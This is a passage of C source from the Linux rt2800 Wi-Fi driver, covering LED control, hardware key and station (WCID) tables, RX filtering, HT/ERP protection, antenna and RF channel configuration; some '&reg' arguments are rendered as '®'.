rt2x00_get_field16(led->rt2x00dev->led_mcu_reg,
EEPROM_FREQ_LED_POLARITY);
unsigned int ledmode =
rt2x00_get_field16(led->rt2x00dev->led_mcu_reg,
EEPROM_FREQ_LED_MODE);
u32 reg;
/* Check for SoC (SOC devices don't support MCU requests) */
if (rt2x00_is_soc(led->rt2x00dev)) {
rt2800_register_read(led->rt2x00dev, LED_CFG, ®);
/* Set LED Polarity */
rt2x00_set_field32(®, LED_CFG_LED_POLAR, polarity);
/* Set LED Mode */
if (led->type == LED_TYPE_RADIO) {
rt2x00_set_field32(®, LED_CFG_G_LED_MODE,
enabled ? 3 : 0);
} else if (led->type == LED_TYPE_ASSOC) {
rt2x00_set_field32(®, LED_CFG_Y_LED_MODE,
enabled ? 3 : 0);
} else if (led->type == LED_TYPE_QUALITY) {
rt2x00_set_field32(®, LED_CFG_R_LED_MODE,
enabled ? 3 : 0);
}
rt2800_register_write(led->rt2x00dev, LED_CFG, reg);
} else {
if (led->type == LED_TYPE_RADIO) {
rt2800_mcu_request(led->rt2x00dev, MCU_LED, 0xff, ledmode,
enabled ? 0x20 : 0);
} else if (led->type == LED_TYPE_ASSOC) {
rt2800_mcu_request(led->rt2x00dev, MCU_LED, 0xff, ledmode,
enabled ? (bg_mode ? 0x60 : 0xa0) : 0x20);
} else if (led->type == LED_TYPE_QUALITY) {
/*
* The brightness is divided into 6 levels (0 - 5),
* The specs tell us the following levels:
* 0, 1 ,3, 7, 15, 31
* to determine the level in a simple way we can simply
* work with bitshifting:
* (1 << level) - 1
*/
rt2800_mcu_request(led->rt2x00dev, MCU_LED_STRENGTH, 0xff,
(1 << brightness / (LED_FULL / 6)) - 1,
polarity);
}
}
}
static void rt2800_init_led(struct rt2x00_dev *rt2x00dev,
struct rt2x00_led *led, enum led_type type)
{
led->rt2x00dev = rt2x00dev;
led->type = type;
led->led_dev.brightness_set = rt2800_brightness_set;
led->flags = LED_INITIALIZED;
}
#endif /* CPTCFG_RT2X00_LIB_LEDS */
/*
* Configuration handlers.
*/
static void rt2800_config_wcid(struct rt2x00_dev *rt2x00dev,
const u8 *address,
int wcid)
{
struct mac_wcid_entry wcid_entry;
u32 offset;
offset = MAC_WCID_ENTRY(wcid);
memset(&wcid_entry, 0xff, sizeof(wcid_entry));
if (address)
memcpy(wcid_entry.mac, address, ETH_ALEN);
rt2800_register_multiwrite(rt2x00dev, offset,
&wcid_entry, sizeof(wcid_entry));
}
static void rt2800_delete_wcid_attr(struct rt2x00_dev *rt2x00dev, int wcid)
{
u32 offset;
offset = MAC_WCID_ATTR_ENTRY(wcid);
rt2800_register_write(rt2x00dev, offset, 0);
}
static void rt2800_config_wcid_attr_bssidx(struct rt2x00_dev *rt2x00dev,
int wcid, u32 bssidx)
{
u32 offset = MAC_WCID_ATTR_ENTRY(wcid);
u32 reg;
/*
* The BSS Idx numbers is split in a main value of 3 bits,
* and a extended field for adding one additional bit to the value.
*/
rt2800_register_read(rt2x00dev, offset, ®);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_BSS_IDX, (bssidx & 0x7));
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_BSS_IDX_EXT,
(bssidx & 0x8) >> 3);
rt2800_register_write(rt2x00dev, offset, reg);
}
static void rt2800_config_wcid_attr_cipher(struct rt2x00_dev *rt2x00dev,
struct rt2x00lib_crypto *crypto,
struct ieee80211_key_conf *key)
{
struct mac_iveiv_entry iveiv_entry;
u32 offset;
u32 reg;
offset = MAC_WCID_ATTR_ENTRY(key->hw_key_idx);
if (crypto->cmd == SET_KEY) {
rt2800_register_read(rt2x00dev, offset, ®);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_KEYTAB,
!!(key->flags & IEEE80211_KEY_FLAG_PAIRWISE));
/*
* Both the cipher as the BSS Idx numbers are split in a main
* value of 3 bits, and a extended field for adding one additional
* bit to the value.
*/
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_CIPHER,
(crypto->cipher & 0x7));
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_CIPHER_EXT,
(crypto->cipher & 0x8) >> 3);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_RX_WIUDF, crypto->cipher);
rt2800_register_write(rt2x00dev, offset, reg);
} else {
/* Delete the cipher without touching the bssidx */
rt2800_register_read(rt2x00dev, offset, ®);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_KEYTAB, 0);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_CIPHER, 0);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_CIPHER_EXT, 0);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_RX_WIUDF, 0);
rt2800_register_write(rt2x00dev, offset, reg);
}
offset = MAC_IVEIV_ENTRY(key->hw_key_idx);
memset(&iveiv_entry, 0, sizeof(iveiv_entry));
if ((crypto->cipher == CIPHER_TKIP) ||
(crypto->cipher == CIPHER_TKIP_NO_MIC) ||
(crypto->cipher == CIPHER_AES))
iveiv_entry.iv[3] |= 0x20;
iveiv_entry.iv[3] |= key->keyidx << 6;
rt2800_register_multiwrite(rt2x00dev, offset,
&iveiv_entry, sizeof(iveiv_entry));
}
int rt2800_config_shared_key(struct rt2x00_dev *rt2x00dev,
struct rt2x00lib_crypto *crypto,
struct ieee80211_key_conf *key)
{
struct hw_key_entry key_entry;
struct rt2x00_field32 field;
u32 offset;
u32 reg;
if (crypto->cmd == SET_KEY) {
key->hw_key_idx = (4 * crypto->bssidx) + key->keyidx;
memcpy(key_entry.key, crypto->key,
sizeof(key_entry.key));
memcpy(key_entry.tx_mic, crypto->tx_mic,
sizeof(key_entry.tx_mic));
memcpy(key_entry.rx_mic, crypto->rx_mic,
sizeof(key_entry.rx_mic));
offset = SHARED_KEY_ENTRY(key->hw_key_idx);
rt2800_register_multiwrite(rt2x00dev, offset,
&key_entry, sizeof(key_entry));
}
/*
* The cipher types are stored over multiple registers
* starting with SHARED_KEY_MODE_BASE each word will have
* 32 bits and contains the cipher types for 2 bssidx each.
* Using the correct defines correctly will cause overhead,
* so just calculate the correct offset.
*/
field.bit_offset = 4 * (key->hw_key_idx % 8);
field.bit_mask = 0x7 << field.bit_offset;
offset = SHARED_KEY_MODE_ENTRY(key->hw_key_idx / 8);
rt2800_register_read(rt2x00dev, offset, ®);
rt2x00_set_field32(®, field,
(crypto->cmd == SET_KEY) * crypto->cipher);
rt2800_register_write(rt2x00dev, offset, reg);
/*
* Update WCID information
*/
rt2800_config_wcid(rt2x00dev, crypto->address, key->hw_key_idx);
rt2800_config_wcid_attr_bssidx(rt2x00dev, key->hw_key_idx,
crypto->bssidx);
rt2800_config_wcid_attr_cipher(rt2x00dev, crypto, key);
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_config_shared_key);
int rt2800_config_pairwise_key(struct rt2x00_dev *rt2x00dev,
struct rt2x00lib_crypto *crypto,
struct ieee80211_key_conf *key)
{
struct hw_key_entry key_entry;
u32 offset;
if (crypto->cmd == SET_KEY) {
/*
* Allow key configuration only for STAs that are
* known by the hw.
*/
if (crypto->wcid > WCID_END)
return -ENOSPC;
key->hw_key_idx = crypto->wcid;
memcpy(key_entry.key, crypto->key,
sizeof(key_entry.key));
memcpy(key_entry.tx_mic, crypto->tx_mic,
sizeof(key_entry.tx_mic));
memcpy(key_entry.rx_mic, crypto->rx_mic,
sizeof(key_entry.rx_mic));
offset = PAIRWISE_KEY_ENTRY(key->hw_key_idx);
rt2800_register_multiwrite(rt2x00dev, offset,
&key_entry, sizeof(key_entry));
}
/*
* Update WCID information
*/
rt2800_config_wcid_attr_cipher(rt2x00dev, crypto, key);
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_config_pairwise_key);
int rt2800_sta_add(struct rt2x00_dev *rt2x00dev, struct ieee80211_vif *vif,
struct ieee80211_sta *sta)
{
int wcid;
struct rt2x00_sta *sta_priv = sta_to_rt2x00_sta(sta);
struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
/*
* Search for the first free WCID entry and return the corresponding
* index.
*/
wcid = find_first_zero_bit(drv_data->sta_ids, STA_IDS_SIZE) + WCID_START;
/*
* Store selected wcid even if it is invalid so that we can
* later decide if the STA is uploaded into the hw.
*/
sta_priv->wcid = wcid;
/*
* No space left in the device, however, we can still communicate
* with the STA -> No error.
*/
if (wcid > WCID_END)
return 0;
__set_bit(wcid - WCID_START, drv_data->sta_ids);
/*
* Clean up WCID attributes and write STA address to the device.
*/
rt2800_delete_wcid_attr(rt2x00dev, wcid);
rt2800_config_wcid(rt2x00dev, sta->addr, wcid);
rt2800_config_wcid_attr_bssidx(rt2x00dev, wcid,
rt2x00lib_get_bssidx(rt2x00dev, vif));
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_sta_add);
int rt2800_sta_remove(struct rt2x00_dev *rt2x00dev, int wcid)
{
struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
if (wcid > WCID_END)
return 0;
/*
* Remove WCID entry, no need to clean the attributes as they will
* get renewed when the WCID is reused.
*/
rt2800_config_wcid(rt2x00dev, NULL, wcid);
__clear_bit(wcid - WCID_START, drv_data->sta_ids);
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_sta_remove);
void rt2800_config_filter(struct rt2x00_dev *rt2x00dev,
const unsigned int filter_flags)
{
u32 reg;
/*
* Start configuration steps.
* Note that the version error will always be dropped
* and broadcast frames will always be accepted since
* there is no filter for it at this time.
*/
rt2800_register_read(rt2x00dev, RX_FILTER_CFG, ®);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_CRC_ERROR,
!(filter_flags & FIF_FCSFAIL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_PHY_ERROR,
!(filter_flags & FIF_PLCPFAIL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_NOT_TO_ME, 1);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_NOT_MY_BSSD, 0);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_VER_ERROR, 1);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_MULTICAST,
!(filter_flags & FIF_ALLMULTI));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_BROADCAST, 0);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_DUPLICATE, 1);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_CF_END_ACK,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_CF_END,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_ACK,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_CTS,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_RTS,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_PSPOLL,
!(filter_flags & FIF_PSPOLL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_BA, 0);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_BAR,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_CNTL,
!(filter_flags & FIF_CONTROL));
rt2800_register_write(rt2x00dev, RX_FILTER_CFG, reg);
}
EXPORT_SYMBOL_GPL(rt2800_config_filter);
void rt2800_config_intf(struct rt2x00_dev *rt2x00dev, struct rt2x00_intf *intf,
struct rt2x00intf_conf *conf, const unsigned int flags)
{
u32 reg;
bool update_bssid = false;
if (flags & CONFIG_UPDATE_TYPE) {
/*
* Enable synchronisation.
*/
rt2800_register_read(rt2x00dev, BCN_TIME_CFG, ®);
rt2x00_set_field32(®, BCN_TIME_CFG_TSF_SYNC, conf->sync);
rt2800_register_write(rt2x00dev, BCN_TIME_CFG, reg);
if (conf->sync == TSF_SYNC_AP_NONE) {
/*
* Tune beacon queue transmit parameters for AP mode
*/
rt2800_register_read(rt2x00dev, TBTT_SYNC_CFG, ®);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_CWMIN, 0);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_AIFSN, 1);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_EXP_WIN, 32);
rt2x00_set_field32(®, TBTT_SYNC_CFG_TBTT_ADJUST, 0);
rt2800_register_write(rt2x00dev, TBTT_SYNC_CFG, reg);
} else {
rt2800_register_read(rt2x00dev, TBTT_SYNC_CFG, ®);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_CWMIN, 4);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_AIFSN, 2);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_EXP_WIN, 32);
rt2x00_set_field32(®, TBTT_SYNC_CFG_TBTT_ADJUST, 16);
rt2800_register_write(rt2x00dev, TBTT_SYNC_CFG, reg);
}
}
if (flags & CONFIG_UPDATE_MAC) {
if (flags & CONFIG_UPDATE_TYPE &&
conf->sync == TSF_SYNC_AP_NONE) {
/*
* The BSSID register has to be set to our own mac
* address in AP mode.
*/
memcpy(conf->bssid, conf->mac, sizeof(conf->mac));
update_bssid = true;
}
if (!is_zero_ether_addr((const u8 *)conf->mac)) {
reg = le32_to_cpu(conf->mac[1]);
rt2x00_set_field32(®, MAC_ADDR_DW1_UNICAST_TO_ME_MASK, 0xff);
conf->mac[1] = cpu_to_le32(reg);
}
rt2800_register_multiwrite(rt2x00dev, MAC_ADDR_DW0,
conf->mac, sizeof(conf->mac));
}
if ((flags & CONFIG_UPDATE_BSSID) || update_bssid) {
if (!is_zero_ether_addr((const u8 *)conf->bssid)) {
reg = le32_to_cpu(conf->bssid[1]);
rt2x00_set_field32(®, MAC_BSSID_DW1_BSS_ID_MASK, 3);
rt2x00_set_field32(®, MAC_BSSID_DW1_BSS_BCN_NUM, 0);
conf->bssid[1] = cpu_to_le32(reg);
}
rt2800_register_multiwrite(rt2x00dev, MAC_BSSID_DW0,
conf->bssid, sizeof(conf->bssid));
}
}
EXPORT_SYMBOL_GPL(rt2800_config_intf);
static void rt2800_config_ht_opmode(struct rt2x00_dev *rt2x00dev,
struct rt2x00lib_erp *erp)
{
bool any_sta_nongf = !!(erp->ht_opmode &
IEEE80211_HT_OP_MODE_NON_GF_STA_PRSNT);
u8 protection = erp->ht_opmode & IEEE80211_HT_OP_MODE_PROTECTION;
u8 mm20_mode, mm40_mode, gf20_mode, gf40_mode;
u16 mm20_rate, mm40_rate, gf20_rate, gf40_rate;
u32 reg;
/* default protection rate for HT20: OFDM 24M */
mm20_rate = gf20_rate = 0x4004;
/* default protection rate for HT40: duplicate OFDM 24M */
mm40_rate = gf40_rate = 0x4084;
switch (protection) {
case IEEE80211_HT_OP_MODE_PROTECTION_NONE:
/*
* All STAs in this BSS are HT20/40 but there might be
* STAs not supporting greenfield mode.
* => Disable protection for HT transmissions.
*/
mm20_mode = mm40_mode = gf20_mode = gf40_mode = 0;
break;
case IEEE80211_HT_OP_MODE_PROTECTION_20MHZ:
/*
* All STAs in this BSS are HT20 or HT20/40 but there
* might be STAs not supporting greenfield mode.
* => Protect all HT40 transmissions.
*/
mm20_mode = gf20_mode = 0;
mm40_mode = gf40_mode = 2;
break;
case IEEE80211_HT_OP_MODE_PROTECTION_NONMEMBER:
/*
* Nonmember protection:
* According to 802.11n we _should_ protect all
* HT transmissions (but we don't have to).
*
* But if cts_protection is enabled we _shall_ protect
* all HT transmissions using a CCK rate.
*
* And if any station is non GF we _shall_ protect
* GF transmissions.
*
* We decide to protect everything
* -> fall through to mixed mode.
*/
case IEEE80211_HT_OP_MODE_PROTECTION_NONHT_MIXED:
/*
* Legacy STAs are present
* => Protect all HT transmissions.
*/
mm20_mode = mm40_mode = gf20_mode = gf40_mode = 2;
/*
* If erp protection is needed we have to protect HT
* transmissions with CCK 11M long preamble.
*/
if (erp->cts_protection) {
/* don't duplicate RTS/CTS in CCK mode */
mm20_rate = mm40_rate = 0x0003;
gf20_rate = gf40_rate = 0x0003;
}
break;
}
/* check for STAs not supporting greenfield mode */
if (any_sta_nongf)
gf20_mode = gf40_mode = 2;
/* Update HT protection config */
rt2800_register_read(rt2x00dev, MM20_PROT_CFG, ®);
rt2x00_set_field32(®, MM20_PROT_CFG_PROTECT_RATE, mm20_rate);
rt2x00_set_field32(®, MM20_PROT_CFG_PROTECT_CTRL, mm20_mode);
rt2800_register_write(rt2x00dev, MM20_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, MM40_PROT_CFG, ®);
rt2x00_set_field32(®, MM40_PROT_CFG_PROTECT_RATE, mm40_rate);
rt2x00_set_field32(®, MM40_PROT_CFG_PROTECT_CTRL, mm40_mode);
rt2800_register_write(rt2x00dev, MM40_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, GF20_PROT_CFG, ®);
rt2x00_set_field32(®, GF20_PROT_CFG_PROTECT_RATE, gf20_rate);
rt2x00_set_field32(®, GF20_PROT_CFG_PROTECT_CTRL, gf20_mode);
rt2800_register_write(rt2x00dev, GF20_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, GF40_PROT_CFG, ®);
rt2x00_set_field32(®, GF40_PROT_CFG_PROTECT_RATE, gf40_rate);
rt2x00_set_field32(®, GF40_PROT_CFG_PROTECT_CTRL, gf40_mode);
rt2800_register_write(rt2x00dev, GF40_PROT_CFG, reg);
}
void rt2800_config_erp(struct rt2x00_dev *rt2x00dev, struct rt2x00lib_erp *erp,
u32 changed)
{
u32 reg;
if (changed & BSS_CHANGED_ERP_PREAMBLE) {
rt2800_register_read(rt2x00dev, AUTO_RSP_CFG, ®);
rt2x00_set_field32(®, AUTO_RSP_CFG_BAC_ACK_POLICY,
!!erp->short_preamble);
rt2x00_set_field32(®, AUTO_RSP_CFG_AR_PREAMBLE,
!!erp->short_preamble);
rt2800_register_write(rt2x00dev, AUTO_RSP_CFG, reg);
}
if (changed & BSS_CHANGED_ERP_CTS_PROT) {
rt2800_register_read(rt2x00dev, OFDM_PROT_CFG, ®);
rt2x00_set_field32(®, OFDM_PROT_CFG_PROTECT_CTRL,
erp->cts_protection ? 2 : 0);
rt2800_register_write(rt2x00dev, OFDM_PROT_CFG, reg);
}
if (changed & BSS_CHANGED_BASIC_RATES) {
rt2800_register_write(rt2x00dev, LEGACY_BASIC_RATE,
erp->basic_rates);
rt2800_register_write(rt2x00dev, HT_BASIC_RATE, 0x00008003);
}
if (changed & BSS_CHANGED_ERP_SLOT) {
rt2800_register_read(rt2x00dev, BKOFF_SLOT_CFG, ®);
rt2x00_set_field32(®, BKOFF_SLOT_CFG_SLOT_TIME,
erp->slot_time);
rt2800_register_write(rt2x00dev, BKOFF_SLOT_CFG, reg);
rt2800_register_read(rt2x00dev, XIFS_TIME_CFG, ®);
rt2x00_set_field32(®, XIFS_TIME_CFG_EIFS, erp->eifs);
rt2800_register_write(rt2x00dev, XIFS_TIME_CFG, reg);
}
if (changed & BSS_CHANGED_BEACON_INT) {
rt2800_register_read(rt2x00dev, BCN_TIME_CFG, ®);
rt2x00_set_field32(®, BCN_TIME_CFG_BEACON_INTERVAL,
erp->beacon_int * 16);
rt2800_register_write(rt2x00dev, BCN_TIME_CFG, reg);
}
if (changed & BSS_CHANGED_HT)
rt2800_config_ht_opmode(rt2x00dev, erp);
}
EXPORT_SYMBOL_GPL(rt2800_config_erp);
static void rt2800_config_3572bt_ant(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
u16 eeprom;
u8 led_ctrl, led_g_mode, led_r_mode;
rt2800_register_read(rt2x00dev, GPIO_SWITCH, ®);
if (rt2x00dev->curr_band == IEEE80211_BAND_5GHZ) {
rt2x00_set_field32(®, GPIO_SWITCH_0, 1);
rt2x00_set_field32(®, GPIO_SWITCH_1, 1);
} else {
rt2x00_set_field32(®, GPIO_SWITCH_0, 0);
rt2x00_set_field32(®, GPIO_SWITCH_1, 0);
}
rt2800_register_write(rt2x00dev, GPIO_SWITCH, reg);
rt2800_register_read(rt2x00dev, LED_CFG, ®);
led_g_mode = rt2x00_get_field32(reg, LED_CFG_LED_POLAR) ? 3 : 0;
led_r_mode = rt2x00_get_field32(reg, LED_CFG_LED_POLAR) ? 0 : 3;
if (led_g_mode != rt2x00_get_field32(reg, LED_CFG_G_LED_MODE) ||
led_r_mode != rt2x00_get_field32(reg, LED_CFG_R_LED_MODE)) {
rt2800_eeprom_read(rt2x00dev, EEPROM_FREQ, &eeprom);
led_ctrl = rt2x00_get_field16(eeprom, EEPROM_FREQ_LED_MODE);
if (led_ctrl == 0 || led_ctrl > 0x40) {
rt2x00_set_field32(®, LED_CFG_G_LED_MODE, led_g_mode);
rt2x00_set_field32(®, LED_CFG_R_LED_MODE, led_r_mode);
rt2800_register_write(rt2x00dev, LED_CFG, reg);
} else {
rt2800_mcu_request(rt2x00dev, MCU_BAND_SELECT, 0xff,
(led_g_mode << 2) | led_r_mode, 1);
}
}
}
static void rt2800_set_ant_diversity(struct rt2x00_dev *rt2x00dev,
enum antenna ant)
{
u32 reg;
u8 eesk_pin = (ant == ANTENNA_A) ? 1 : 0;
u8 gpio_bit3 = (ant == ANTENNA_A) ? 0 : 1;
if (rt2x00_is_pci(rt2x00dev)) {
rt2800_register_read(rt2x00dev, E2PROM_CSR, ®);
rt2x00_set_field32(®, E2PROM_CSR_DATA_CLOCK, eesk_pin);
rt2800_register_write(rt2x00dev, E2PROM_CSR, reg);
} else if (rt2x00_is_usb(rt2x00dev))
rt2800_mcu_request(rt2x00dev, MCU_ANT_SELECT, 0xff,
eesk_pin, 0);
rt2800_register_read(rt2x00dev, GPIO_CTRL, ®);
rt2x00_set_field32(®, GPIO_CTRL_DIR3, 0);
rt2x00_set_field32(®, GPIO_CTRL_VAL3, gpio_bit3);
rt2800_register_write(rt2x00dev, GPIO_CTRL, reg);
}
void rt2800_config_ant(struct rt2x00_dev *rt2x00dev, struct antenna_setup *ant)
{
u8 r1;
u8 r3;
u16 eeprom;
rt2800_bbp_read(rt2x00dev, 1, &r1);
rt2800_bbp_read(rt2x00dev, 3, &r3);
if (rt2x00_rt(rt2x00dev, RT3572) &&
rt2x00_has_cap_bt_coexist(rt2x00dev))
rt2800_config_3572bt_ant(rt2x00dev);
/*
* Configure the TX antenna.
*/
switch (ant->tx_chain_num) {
case 1:
rt2x00_set_field8(&r1, BBP1_TX_ANTENNA, 0);
break;
case 2:
if (rt2x00_rt(rt2x00dev, RT3572) &&
rt2x00_has_cap_bt_coexist(rt2x00dev))
rt2x00_set_field8(&r1, BBP1_TX_ANTENNA, 1);
else
rt2x00_set_field8(&r1, BBP1_TX_ANTENNA, 2);
break;
case 3:
rt2x00_set_field8(&r1, BBP1_TX_ANTENNA, 2);
break;
}
/*
* Configure the RX antenna.
*/
switch (ant->rx_chain_num) {
case 1:
if (rt2x00_rt(rt2x00dev, RT3070) ||
rt2x00_rt(rt2x00dev, RT3090) ||
rt2x00_rt(rt2x00dev, RT3352) ||
rt2x00_rt(rt2x00dev, RT3390)) {
rt2800_eeprom_read(rt2x00dev,
EEPROM_NIC_CONF1, &eeprom);
if (rt2x00_get_field16(eeprom,
EEPROM_NIC_CONF1_ANT_DIVERSITY))
rt2800_set_ant_diversity(rt2x00dev,
rt2x00dev->default_ant.rx);
}
rt2x00_set_field8(&r3, BBP3_RX_ANTENNA, 0);
break;
case 2:
if (rt2x00_rt(rt2x00dev, RT3572) &&
rt2x00_has_cap_bt_coexist(rt2x00dev)) {
rt2x00_set_field8(&r3, BBP3_RX_ADC, 1);
rt2x00_set_field8(&r3, BBP3_RX_ANTENNA,
rt2x00dev->curr_band == IEEE80211_BAND_5GHZ);
rt2800_set_ant_diversity(rt2x00dev, ANTENNA_B);
} else {
rt2x00_set_field8(&r3, BBP3_RX_ANTENNA, 1);
}
break;
case 3:
rt2x00_set_field8(&r3, BBP3_RX_ANTENNA, 2);
break;
}
rt2800_bbp_write(rt2x00dev, 3, r3);
rt2800_bbp_write(rt2x00dev, 1, r1);
if (rt2x00_rt(rt2x00dev, RT3593)) {
if (ant->rx_chain_num == 1)
rt2800_bbp_write(rt2x00dev, 86, 0x00);
else
rt2800_bbp_write(rt2x00dev, 86, 0x46);
}
}
EXPORT_SYMBOL_GPL(rt2800_config_ant);
static void rt2800_config_lna_gain(struct rt2x00_dev *rt2x00dev,
struct rt2x00lib_conf *libconf)
{
u16 eeprom;
short lna_gain;
if (libconf->rf.channel <= 14) {
rt2800_eeprom_read(rt2x00dev, EEPROM_LNA, &eeprom);
lna_gain = rt2x00_get_field16(eeprom, EEPROM_LNA_BG);
} else if (libconf->rf.channel <= 64) {
rt2800_eeprom_read(rt2x00dev, EEPROM_LNA, &eeprom);
lna_gain = rt2x00_get_field16(eeprom, EEPROM_LNA_A0);
} else if (libconf->rf.channel <= 128) {
if (rt2x00_rt(rt2x00dev, RT3593)) {
rt2800_eeprom_read(rt2x00dev, EEPROM_EXT_LNA2, &eeprom);
lna_gain = rt2x00_get_field16(eeprom,
EEPROM_EXT_LNA2_A1);
} else {
rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_BG2, &eeprom);
lna_gain = rt2x00_get_field16(eeprom,
EEPROM_RSSI_BG2_LNA_A1);
}
} else {
if (rt2x00_rt(rt2x00dev, RT3593)) {
rt2800_eeprom_read(rt2x00dev, EEPROM_EXT_LNA2, &eeprom);
lna_gain = rt2x00_get_field16(eeprom,
EEPROM_EXT_LNA2_A2);
} else {
rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_A2, &eeprom);
lna_gain = rt2x00_get_field16(eeprom,
EEPROM_RSSI_A2_LNA_A2);
}
}
rt2x00dev->lna_gain = lna_gain;
}
#define FREQ_OFFSET_BOUND 0x5f
static void rt2800_adjust_freq_offset(struct rt2x00_dev *rt2x00dev)
{
u8 freq_offset, prev_freq_offset;
u8 rfcsr, prev_rfcsr;
freq_offset = rt2x00_get_field8(rt2x00dev->freq_offset, RFCSR17_CODE);
freq_offset = min_t(u8, freq_offset, FREQ_OFFSET_BOUND);
rt2800_rfcsr_read(rt2x00dev, 17, &rfcsr);
prev_rfcsr = rfcsr;
rt2x00_set_field8(&rfcsr, RFCSR17_CODE, freq_offset);
if (rfcsr == prev_rfcsr)
return;
if (rt2x00_is_usb(rt2x00dev)) {
rt2800_mcu_request(rt2x00dev, MCU_FREQ_OFFSET, 0xff,
freq_offset, prev_rfcsr);
return;
}
prev_freq_offset = rt2x00_get_field8(prev_rfcsr, RFCSR17_CODE);
while (prev_freq_offset != freq_offset) {
if (prev_freq_offset < freq_offset)
prev_freq_offset++;
else
prev_freq_offset--;
rt2x00_set_field8(&rfcsr, RFCSR17_CODE, prev_freq_offset);
rt2800_rfcsr_write(rt2x00dev, 17, rfcsr);
usleep_range(1000, 1500);
}
}
static void rt2800_config_channel_rf2xxx(struct rt2x00_dev *rt2x00dev,
struct ieee80211_conf *conf,
struct rf_channel *rf,
struct channel_info *info)
{
rt2x00_set_field32(&rf->rf4, RF4_FREQ_OFFSET, rt2x00dev->freq_offset);
if (rt2x00dev->default_ant.tx_chain_num == 1)
rt2x00_set_field32(&rf->rf2, RF2_ANTENNA_TX1, 1);
if (rt2x00dev->default_ant.rx_chain_num == 1) {
rt2x00_set_field32(&rf->rf2, RF2_ANTENNA_RX1, 1);
rt2x00_set_field32(&rf->rf2, RF2_ANTENNA_RX2, 1);
} else if (rt2x00dev->default_ant.rx_chain_num == 2)
rt2x00_set_field32(&rf->rf2, RF2_ANTENNA_RX2, 1);
if (rf->channel > 14) {
/*
* When TX power is below 0, we should increase it by 7 to
* make it a positive value (Minimum value is -7).
* However this means that values between 0 and 7 have
* double meaning, and we should set a 7DBm boost flag.
*/
rt2x00_set_field32(&rf->rf3, RF3_TXPOWER_A_7DBM_BOOST,
(info->default_power1 >= 0));
if (info->default_power1 < 0)
info->default_power1 += 7;
rt2x00_set_field32(&rf->rf3, RF3_TXPOWER_A, info->default_power1);
rt2x00_set_field32(&rf->rf4, RF4_TXPOWER_A_7DBM_BOOST,
(info->default_power2 >= 0));
if (info->default_power2 < 0)
info->default_power2 += 7;
rt2x00_set_field32(&rf->rf4, RF4_TXPOWER_A, info->default_power2);
} else {
rt2x00_set_field32(&rf->rf3, RF3_TXPOWER_G, info->default_power1);
rt2x00_set_field32(&rf->rf4, RF4_TXPOWER_G, info->default_power2);
}
rt2x00_set_field32(&rf->rf4, RF4_HT40, conf_is_ht40(conf));
rt2800_rf_write(rt2x00dev, 1, rf->rf1);
rt2800_rf_write(rt2x00dev, 2, rf->rf2);
rt2800_rf_write(rt2x00dev, 3, rf->rf3 & ~0x00000004);
rt2800_rf_write(rt2x00dev, 4, rf->rf4);
udelay(200);
rt2800_rf_write(rt2x00dev, 1, rf->rf1);
rt2800_rf_write(rt2x00dev, 2, rf->rf2);
rt2800_rf_write(rt2x00dev, 3, rf->rf3 | 0x00000004);
rt2800_rf_write(rt2x00dev, 4, rf->rf4);
udelay(200);
rt2800_rf_write(rt2x00dev, 1, rf->rf1);
rt2800_rf_write(rt2x00dev, 2, rf->rf2);
rt2800_rf_write(rt2x00dev, 3, rf->rf3 & ~0x00000004);
rt2800_rf_write(rt2x00dev, 4, rf->rf4);
}
static void rt2800_config_channel_rf3xxx(struct rt2x00_dev *rt2x00dev,
struct ieee80211_conf *conf,
struct rf_channel *rf,
struct channel_info *info)
{
struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
u8 rfcsr, calib_tx, calib_rx;
rt2800_rfcsr_write(rt2x00dev, 2, rf->rf1);
rt2800_rfcsr_read(rt2x00dev, 3, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR3_K, rf->rf3);
rt2800_rfcsr_write(rt2x00dev, 3, rfcsr);
